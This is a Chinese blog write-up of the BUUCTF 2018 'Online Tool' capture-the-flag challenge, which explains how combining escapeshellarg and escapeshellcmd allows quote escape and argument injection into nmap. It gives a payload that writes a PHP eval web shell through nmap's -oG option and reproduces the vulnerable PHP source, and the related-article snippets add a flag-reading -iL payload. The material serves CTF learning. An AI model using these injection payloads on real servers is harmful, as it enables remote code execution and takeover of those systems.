[BUUCTF 2018]Online Tool

最新推荐文章于 2022-10-15 20:57:48 发布
最新推荐文章于 2022-10-15 20:57:48 发布
阅读量6.1k 收藏 12
点赞数 7
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44077544/article/details/102835099
版权

我到底到什么时候,才能学会,看知识点写题,而不是看题解写题。
原因:
基础太差,无法把漏洞知识与实际相结合。 “漏洞知道了,可这和这道题有什么关系?”就是我目前的状态。

如果我知道

  • namp -PS 127.0.0.1
  • namp -PS ‘’ 127.0.0.1
  • nmap -PS ’ " " ’ 127.0.0.1 " "
    引号闭合后,加上这些,无影响

如果我知道

  • namp <?php phpinfo(); ?> -oG 1.php
    可以写入一个文件
  • namp nmap <?php phpinfo();> -oG 1.php\’
    会写成1.php‘ 而不是 1.php

放一篇讲escapeshellarg函数的,讲的很多,但是这道题,就用前面的一小部分,就可以了。我咋就想不到了。
escapeshellarg讲解
namp 可以写木马,那么我们要做的,让nmap执行那个命令。但是
这两个函数。会把我们的命令给放道单引号里,
'\<\?php eval\(\$_POST\[\"a\"\]\)\;\?\> -oG 1.php'最后的语句,就变成了:
nmap -T5 -sT -Pn --host-timeout 2 -F '\<\?php eval\(\$_POST\[\"a\"\]\)\;\?\> -oG 1.php' 我们的命令,被当成了字符串,而不是一条命令,那么我们就要想办法,闭合单引号。

绕过

先取出来这部分代码,测试一下:

$host = $_GET['host'];
    echo $host."<br>";
    $host = escapeshellarg($host);
    echo $host."<br>";
    $host = escapeshellcmd($host);
    echo $host."<br>";

在这里插入图片描述如果我们在数据后面,加上一个单引号,所有的单引号都闭合了,那么我们在单引号后面,就可以加上我们想要执行的命令了。
在这里插入图片描述这样的话,语句就变成了:
nmap -T5 -sT -Pn --host-timeout 2 -F '1'\\'' shellcode\' ,因为所有的单引号都被闭合了,所以可以忽略。放出paylod:
'<?php eval($_POST["a"]);?> -oG 1.php '

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
?>
沐目_01
关注
  • 7
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
专栏目录
[BUUCTF 2018]Online Tool -wp
freerats的博客
07-03 336
打开网页可以看到代码,进行代码审计 $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox); 获取你的ip,然后进行加密,把MD5值输出,然后以这个值创建一个目录 尝试一下127.0.0.1 ,发现调用nmap对输入的ip进行扫描 $host = $_GET['host']; $ho.
[BUUCTF 2018]Online Tool1
最新发布
m0_73673698的博客
06-08 599
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。接下来是通过get方法传入host参数,经过escapeshellarg和escapeshellcmd两个函数过滤后,拼接到nmap命令后,通过system系统命令来执行命令。发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件这个命令就是我们的输入可控!通过上面的操作逃过了单引号,但escapeshellcmd会对这些特殊符号前面加上\来转义…
2021-08-14BUUCTF 2018]Online Tool(escapeshellarg+escapeshellcmd函数连用导致rce、nmap -oG写shell转)
qq_45290991的博客
08-14 372
本文转自大佬K0f1i先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset(KaTeX parse error: Double subscript at position 110: …string">'HTTP_X_̲FOR...
Seal Online Tool_tool_ToolsItem.scr_
10-02
《Seal Online Tool_tool_ToolsItem.scr》是一款专门针对网络游戏《封印传说》(Seal Online)的离线编辑工具。它主要用于编辑游戏中的物品脚本( SCR 文件),允许玩家在不连接到游戏服务器的情况下对游戏内的道具...
sqlTool.rar_Online SQL Tool_SQLTool_sqlto
09-24
标题中的"sqlTool.rar_Online SQL Tool_SQLTool_sqlto"提到了一个名为"SQLTool"的在线SQL处理工具。这个工具允许用户通过网络界面执行SQL语句,进行数据库的查询、更新、插入和删除等操作,无需在本地安装任何特定的...
Online-Compile
01-30
Online_Compile
online_classroom.csv
03-17
CSDN因果分析系列相关数据
qt-unified-windows-x86-online.exe
07-14
"qt-unified-windows-x86-online.exe" 是一个用于Windows 32位系统的QT在线安装程序,它提供了方便的方式来下载和安装QT开发环境。 这个安装程序的核心功能包括: 1. **集成安装器**:qt-unified-windows-x86-on...
[BUUCTF 2018]Online Tool(超详细解析payload)
xlcvv的博客
04-15 3771
先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET[...
BUUCTF WEB NMAP
qq_41696858的博客
12-28 362
经典回显关了的NMAP,和之前做过的一台hack the box靶机里面的某一台比较像 那么就是合理利用 -oN的问题了,直接输出flag就可以,但是你一定要连shell也无所谓,多一步连接工作罢了 127.0.0.1 正常回显,-iL代表查找目标主机中的相关文件 下面就是尝试它如何过滤的 直接输出到flag payload:127.0.0.1' -iL /flag -oN flag ' 怎么说呢,我们在127.0.0.1 | ls的时候他把我们的|转义了,那么肯定是有过滤机制的 其中这两个单引号是用来绕过
BUUCTF: [网鼎杯 2020 朱雀组]Nmap
末初的CSDN博客
09-21 1982
是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法写入,尝试写入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤,比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。,那说明导出的文件格式是。即便执行失败也无所谓,
buuctf刷题8 (ssti注入&nmap- oG指令&别样的sql注入)
weixin_63231007的博客
10-15 917
get_flashed_message()是通过flash()传入闪现信息列表的,能够把字符串对象表示的信息加入到一个消息列表,然后通过调用get_flashed_message()来取出。5.__get()中的p赋值为Modifier类,那么相当于Modifier类被当作函数处理,所以会触发Modifier类中的__invoke()魔术方法。继续看一下getSign函数。这样的语法构造还包括:echo,print,unset(),isset(),empty(),include,require,...
BUUCTF [BUUCTF 2018] Online Tool
Senimo
12-09 1443
BUUCTF [BUUCTF 2018] Online Tool 考点: escapeshellarg绕过(参考链接) Nmap -oG 将命令和结果写入文件 启动靶机,给出了页面源码: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { high
ArcGIS Online:企业级云GIS平台与应用
"本文主要介绍了ArcGIS Online,这是一个由Esri公司提供的公有云GIS平台,用于构建企业级GIS应用。文章涵盖了ArcGIS Online的基本架构、功能特性、新功能以及其在组织内部资源共享和协同工作中的作用。同时,讨论了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值